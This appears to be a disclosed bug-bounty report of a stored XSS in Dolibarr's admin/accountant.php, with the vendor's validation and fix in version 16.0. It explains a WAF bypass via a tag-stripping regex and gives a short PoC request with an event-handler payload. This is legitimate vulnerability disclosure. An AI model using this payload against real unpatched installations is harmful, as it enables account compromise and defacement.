A stored XSS in dolibarr/htdocs/admin/accountant.php in dolibarr/dolibarr

Valid

Reported on

Jun 12th 2022

Description

I found a stored XSS in the admin/accountant.php, the field town, name, Accountant code can escape the double quote. In the path 'dolibarr/htdocs/main.inc.php' has a WAF, we can not inject any the javascript onxxx event. However, in the path dolibarr/htdocs/core/lib/functions.lib.php(line 6643), there is a statement:

$temp = preg_replace('/<+([a-z]+)/i', '\1', $temp);

We can use it to bypass the WAF by adding a < in the payload.

Proof of Concept

POST /dolibarr/htdocs/admin/accountant.php HTTP/1.1
...
...&town="on<click=alert(/xss/);"

The PoC Video

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.

We are processing your report and will contact the dolibarr team within 24 hours. a year ago
i0hex modified the report
a year ago
We have contacted a member of the dolibarr team and are waiting to hear back a year ago
i0hex modified the report
a year ago
Laurent Destailleur validated this vulnerability a year ago
i0hex has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Laurent Destailleur marked this as fixed in 16.0 with commit 2b5b99 a year ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation